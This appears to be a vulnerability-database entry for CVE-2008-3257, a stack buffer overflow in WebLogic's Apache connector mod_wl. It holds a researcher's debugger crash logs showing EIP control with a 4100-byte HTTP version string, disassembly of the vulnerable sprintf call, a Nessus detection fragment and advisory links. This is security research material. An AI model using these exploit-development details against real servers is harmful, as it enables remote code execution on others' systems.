Stack-based buffer overflow in the Apache Connector (mod_wl) in Oracle WebLogic Server (formerly BEA WebLogic Server) 10.3 and earlier allows remote attackers to execute arbitrary code via a long HTTP version string, as demonstrated by a string after βPOST /.jspβ in an HTTP request.
Recent assessments:
wchen-r7 at September 12, 2019 6:07pm UTC reported:
Bea Weblogic 8.1 + Apache
<http://docs.oracle.com/cd/E13222_01/wls/docs81/plugins/apache.html>
First crash
(328.c38): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\WINDOWS\system32\RPCRT4.dll -
*** WARNING: Unable to verify checksum for C:\Program Files\Apache Group\Apache2\modules\mod_wl_20.so
*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\Program Files\Apache Group\Apache2\modules\mod_wl_20.so -
eax=00000045 ebx=006a5d58 ecx=43434343 edx=7c90e4f4 esi=10013932 edi=000000a8
eip=77ea4126 esp=0280d7ec ebp=0280e818 iopl=0 ov up ei pl nz na po cy
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010a03
RPCRT4!NdrVaryingArrayUnmarshall+0x81:
77ea4126 008945107416 add byte ptr [ecx+16741045h],cl ds:0023:59b75388=??
0:132> .symfix
0:132> .reload
Reloading current modules
.............................................
*** WARNING: Unable to verify checksum for C:\Program Files\Apache Group\Apache2\modules\mod_wl_20.so
*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\Program Files\Apache Group\Apache2\modules\mod_wl_20.so -
0:132> kb
ChildEBP RetAddr Args to Child
0280e818 10001a8a 006a5d58 006b8ce0 0280fa38 RPCRT4!NdrVaryingArrayUnmarshall+0x82
*** WARNING: Unable to verify checksum for C:\Program Files\Apache Group\Apache2\bin\libhttpd.dll
*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\Program Files\Apache Group\Apache2\bin\libhttpd.dll -
WARNING: Stack unwind information not available. Following frames may be wrong.
0280fef4 6ff0155f 006a5d58 006a1e28 006a5d58 mod_wl_20+0x1a8a
0280ff08 6ff018a9 006a5d58 006a5d58 00000000 libhttpd!ap_run_handler+0x1f
0280ff18 6ff0d97c 006a5d58 006a5d58 6ff097c6 libhttpd!ap_invoke_handler+0xa9
00000000 00000000 00000000 00000000 00000000 libhttpd!ap_die+0x23c
More controlled crash: length 4100
ChildEBP RetAddr Args to Child
WARNING: Frame IP not in any known module. Following frames may be wrong.
0440d7d4 41414141 54544820 2e312f50 000a0d31 0x41414141
*** WARNING: Unable to verify checksum for C:\Program Files\Apache Group\Apache2\modules\mod_wl_20.so
*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\Program Files\Apache Group\Apache2\modules\mod_wl_20.so -
0440e818 10001a8a 006a9388 0069cb20 0440fa38 0x41414141
*** WARNING: Unable to verify checksum for C:\Program Files\Apache Group\Apache2\bin\libhttpd.dll
*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\Program Files\Apache Group\Apache2\bin\libhttpd.dll -
0440fef4 6ff0155f 006a9388 0068dcf8 006a9388 mod_wl_20+0x1a8a
0440ff08 6ff018a9 006a9388 006a9388 00000000 libhttpd!ap_run_handler+0x1f
0440ff18 6ff0d97c 006a9388 006a9388 6ff097c6 libhttpd!ap_invoke_handler+0xa9
00000000 00000000 00000000 00000000 00000000 libhttpd!ap_die+0x23c
mod_wl detection via nessus
weblogic_mod_wl_overflow.nasl: βTITLE>Weblogic Bridge Messageβ >< res[2] ||
POST /index.jsp HTTP/1.1
Host: 192.168.1.130
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:12.0) Gecko/20100101 Firefox/12.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Proxy-Connection: keep-alive
Content-Length: -1
TML>
<HEAD>
<TITLE>Weblogic Bridge Message
</TITLE>
</HEAD>
<BODY>
<h2>Failure of server APACHE bridge:</h2><p>
<hr><pre>Internal Server failure, APACHE plugin. Cannot continue.</pre>
<hr><br><b>Build date/time:</b> <i>Jun 16 2006 15:14:11</i>
<p><hr><b>Change Number:</b> <i>779586</i>
</BODY>
</HTML>
<HTML>
<HEAD>
<TITLE>Weblogic Bridge Message
mod_wl overflow
.text:1000E751 push ecx ; it should be HTTP/1.1 but.... failed :)
.text:1000E752 push edx
.text:1000E753 mov edx, [ebp+214h]
.text:1000E759 push edx
.text:1000E75A push offset aSSS ; "%s %s %s\r\n"
.text:1000E75F push eax ; Dest
.text:1000E760 call ds:sprintf ; here is where overflow happends!
GET EIP on RET
0:244> p
eax=0000014a ebx=00691c28 ecx=41414141 edx=7c90e4f4 esi=0069cb20 edi=0440fa38
eip=1000edeb esp=0440c7b8 ebp=0440e818 iopl=0 nv up ei pl nz na po nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000202
mod_wl_20+0xedeb:
1000edeb 81c41c100000 add esp,101Ch
0:244> db esp
0440c7b8 1f 00 00 00 16 00 00 00-00 00 00 00 4a 01 00 00 ............J...
0440c7c8 48 6f 73 74 3a 20 31 39-32 2e 31 36 38 2e 31 2e Host: 192.168.1.
0440c7d8 31 33 30 0d 0a 55 73 65-72 2d 41 67 65 6e 74 3a 130..User-Agent:
0440c7e8 20 4d 6f 7a 69 6c 6c 61-2f 34 2e 30 20 28 63 6f Mozilla/4.0 (co
0440c7f8 6d 70 61 74 69 62 6c 65-3b 20 4d 53 49 45 20 36 mpatible; MSIE 6
0440c808 2e 30 3b 20 57 69 6e 64-6f 77 73 20 4e 54 20 35 .0; Windows NT 5
0440c818 2e 31 29 0d 0a 43 6f 6e-74 65 6e 74 2d 54 79 70 .1)..Content-Typ
0440c828 65 3a 20 61 70 70 6c 69-63 61 74 69 6f 6e 2f 78 e: application/x
0:244> p
eax=0000014a ebx=00691c28 ecx=41414141 edx=7c90e4f4 esi=0069cb20 edi=0440fa38
eip=1000edf1 esp=0440d7d4 ebp=0440e818 iopl=0 nv up ei pl nz ac pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000216
mod_wl_20+0xedf1:
1000edf1 c3 ret
0:244> db esp
0440d7d4 41 41 41 41 41 41 41 41-01 02 03 04 05 06 07 08 AAAAAAAA........
0440d7e4 09 0b 0c 0e 0f 10 11 12-13 14 15 16 17 18 19 1a ................
0440d7f4 1b 1c 1d 1e 1f 20 21 22-23 24 25 26 27 28 29 2a ..... !"#$%&'()*
0440d804 2b 2c 2d 2e 2f 30 31 32-33 34 35 36 37 38 39 3a +,-./0123456789:
0440d814 3b 3c 3d 3e 40 41 42 43-44 45 46 47 48 49 4a 4b ;<=>@ABCDEFGHIJK
0440d824 4c 4d 4e 4f 50 51 52 53-54 55 56 57 58 59 5a 5b LMNOPQRSTUVWXYZ[
0440d834 5c 5d 5e 5f 60 61 62 63-64 65 66 67 68 69 6a 6b \]^_`abcdefghijk
0440d844 6c 6d 6e 6f 70 71 72 73-74 75 76 77 78 79 7a 7b lmnopqrstuvwxyz{
0:244> t
eax=0000014a ebx=00691c28 ecx=41414141 edx=7c90e4f4 esi=0069cb20 edi=0440fa38
eip=41414141 esp=0440d7d8 ebp=0440e818 iopl=0 nv up ei pl nz ac pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000216
41414141 ?? ???
<http://www.securityfocus.com/bid/30273/info>
Assessed Attacker Value: 0
Assessed Attacker Value: 0Assessed Attacker Value: 0
blogs.oracle.com/security/2008/07/security_alert_for_cve-2008-3257_released.html
secunia.com/advisories/31146
www.attrition.org/pipermail/vim/2008-July/002035.html
www.attrition.org/pipermail/vim/2008-July/002036.html
www.kb.cert.org/vuls/id/716387
www.oracle.com/technology/deploy/security/alerts/alert_cve2008-3257.html
www.securityfocus.com/bid/30273
www.securitytracker.com/id?1020520
www.vupen.com/english/advisories/2008/2145/references
cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3257
exchange.xforce.ibmcloud.com/vulnerabilities/43885
www.exploit-db.com/exploits/6089